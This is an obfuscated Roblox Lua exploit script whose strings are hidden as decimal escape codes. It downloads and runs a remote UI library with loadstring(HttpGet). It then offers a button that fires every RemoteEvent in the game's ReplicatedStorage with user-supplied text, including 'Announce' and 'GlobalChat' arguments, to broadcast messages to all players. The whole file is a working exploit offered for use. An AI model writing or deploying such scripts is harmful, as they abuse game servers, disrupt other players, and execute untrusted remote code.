local _1 = "\104\116\116\112\115\58\47\47\115\105\114\105\117\115\46\109\101\110\117\47\114\97\121\102\105\101\108\100" local _2 = loadstring(game:HttpGet(_1))() local _3 = _2:CreateWindow({ Name = "\83\69\82\86\69\82\32\77\69\83\83\65\71\69\58\32\65\76\76\32\83\69\69\32\40\68\69\84\69\67\84\65\66\76\69\41", LoadingTitle = "\86\69\82\89\32\68\69\84\69\67\84\65\66\76\69", LoadingSubtitle = "\98\121\32\116\104\101\32\100\101\109\111\110", ConfigurationSaving = {Enabled = false}, KeySystem = false }) local _4 = _3:CreateTab("\66\114\111\97\100\99\101\115\116", 4483362458) local _5 = "" _4:CreateInput({ Name = "\77\101\115\115\97\103\101\32\84\101\120\116", PlaceholderText = "\87\97\114\110\105\110\103\46\46\46", RemoveTextAfterFocusLost = false, Callback = function(t) _5 = t end, }) _4:CreateButton({ Name = "\69\88\69\67\85\84\69\32\71\76\79\66\65\76\32\72\73\78\84", Callback = function() if _5 == "" then return end local _w = game:GetService("\119\111\114\107\115\112\97\99\101") local _rs = game:GetService("\82\101\112\108\105\99\97\116\101\100\83\116\111\114\97\103\101") local _h = Instance.new("\72\105\110\116") _h.Text = _5 _h.Parent = _w local _m = Instance.new("\77\101\115\115\97\103\101") _m.Text = _5 _m.Parent = _w task.delay(8, function() if _h then _h:Destroy() end if _m then _m:Destroy() end end) for _, v in ipairs(_rs:GetDescendants()) do if v:IsA("\82\101\109\111\116\101\69\118\101\110\116") then pcall(function() v:FireServer(_5) end) pcall(function() v:FireServer("\65\110\110\111\117\110\99\101", _5) end) pcall(function() v:FireServer("\71\108\111\98\97\108\67\104\97\116", _5) end) end end _2:Notify({ Title = "\65\108\101\114\116", Content = "\83\101\110\116\32\116\111\32\97\108\108\32\112\108\97\121\101\114\115", Duration = 4 }) end, })